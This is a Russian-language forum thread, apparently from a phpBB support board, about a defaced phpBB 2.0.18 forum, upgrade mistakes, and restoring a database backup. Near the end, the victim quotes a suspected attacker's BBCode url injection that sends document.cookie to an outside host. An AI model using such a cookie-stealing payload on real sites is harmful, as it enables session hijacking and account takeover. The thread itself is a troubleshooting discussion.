Взломали 2.0.18

[bas]

Пришел утром на форум а там написано " Hacked by....."
Форум последней версии - 2.0.18. Никаких модов не стояло, кроме "Быстрого ответа" и "внешний вид - PS2". Может кто поможет советом, как избежать подобных "радостей"? Посмотрел на файлы - ничего лишнего пока не нашел ( может удалили).

[Xpert]

Форум изначально был последней версии? Если нет, как вы его обновляли, опишите пошагово.

[bas]

Форум был 2.0.17 Обновил так - скопировал файлы обновления 2.0.18 в каталог с форумом, запустил файл update_to_latest.php.
А сейчас не могу восстановить базу! Пишет Warning: upload_max_filesize of 2097152 bytes exceeded - file [backup_file=E:\phpBB2\phpbb_db_backup.sql] not saved in Unknown on line 0
Файл на диске занимает 5 Мег. Я так понял, что максимально возможный развер фала 2Мега. Как увеличить до 5? Спасибо.

Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел, удалили форумы и написали " свой привет". Лишних файлов не нашел. Либо их не было, либо удалили.

[VVVas]

скопировал файлы обновления 2.0.18 в каталог с форумом, запустил файл update_to_latest.php.

Поздравляю вас - вы обновили только БД.
Никогда не пробовали читать документацию, а? К тому же обновлению, а?

Добавлено спустя 1 минуту 26 секунд:

Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел

Вы слегка подумайте над тем что пишете. Как можно залезть в админку не будучи админом?

[bas]

VVVas
А как залезали в предудущих версиях? Если были косяки в куках/сессиях? Просто подменяли их - и все!
А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!
Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?

[VVVas]

А как залезали в предудущих версиях?

Читайте об этом сами - я не собираюсь вам это пересказывать.

А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!

Может просто пожалели. Либо базу пользователей с мылами утянули и спамерам слили. Если с вашей точки зрения что-то бессмыслено - попробуйте думать с другой точки зрения, а так же расширьте уровень своего восприятия и не отбрасывайте некоторые факты. И с чего вы взяли что не напихали?

Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?

Идите в поиск - обсуждалось.
http://www.phpbbguru.net/community/viewtopic.php?t=861

Тема закрыта.

PS Вот так и получается что форум дырявый - руки просто у некоторых дырявые.

[bas]

Удалил форум! ВСЕ!!! Оставил только базы! Скачал последний дистрибутив! Установил. Восстановил базу данных! Через час - опять надпись " Типа хакнули". Ну, что скажете?
Вот кстати об этом написано тут - http://adminam.net Речь идет про мой форум http://chat.ntsi1.com/forum

[crash]

оставили помоему вам гдето файлик, через который вас имеют.. проверьте все файлы, которые лежат на фтп.

[VVVas]

Значит чего-то вы делаете не так.
Пароли меняли перед этим? Левых админов проверяли?

[bas]

VVVas
"Левых" админов проверил сразу..пароль сменил....
crash
Я проверил - "левых" файлов не обнаружено, или они не на моем сервере.
Про безопасные куки расскажите?

[avm]

Код: Выделить всё

bool setcookie ( string name [, string value [, int expire [, string path [, string domain [, bool secure]]]]] )

secure - Indicates that the cookie should only be transmitted over a secure HTTPS connection. When set to TRUE, the cookie will only be set if a secure connection exists. The default is FALSE

Если вы действительно хотите выяснить что происходит, ответьте сначала на вопросы:
1) вы знаете этого человека Slash [IFF]? не живет ли он где-то недалеко от вас и не подключен ли к той же сети что и вы?
2) код форума вы залили с нуля, а базу восстановили старую? проверяли ли вы ее перед восстановлением на локальном хосте на нежелательные вложения?
3) в какой момент и как именно вы проверяли "левых админов"?
4) какие моды были установлены когда ваш форум был 2.0.17 (ну тоесть до того как вы полностью перезалили новый код)?

[CJ John PM]

bas, кстати, глянь в таблицу пользователей, может там где-то хрен с админскими правами прописался.

[avm]

CJ John PM, написано же:

"Левых" админов проверил сразу..пароль сменил....

[bas]

Вчера отмечали НГ, было не до него (Slash [IFF]). А вот сегодня посмотрел за ним...Вот что он писал:
1) Хм...
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url} Видно только "Хм..."

2) Всех с Новым Годом!
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url}

В общем, ничего нового....залезают через дырки в форуме... Я же говорил черезе куки! :-) Эх phpBB phpBB.....

CJ John Этот хрен в юзерах сидит...Админских прав у него нет. Я пока его оставил, в какой то степени он мне помогает. Всех с новым годом!

[crash]

bas
вообщето это глюк ИЕ, потому как больше нигде этот код не работает.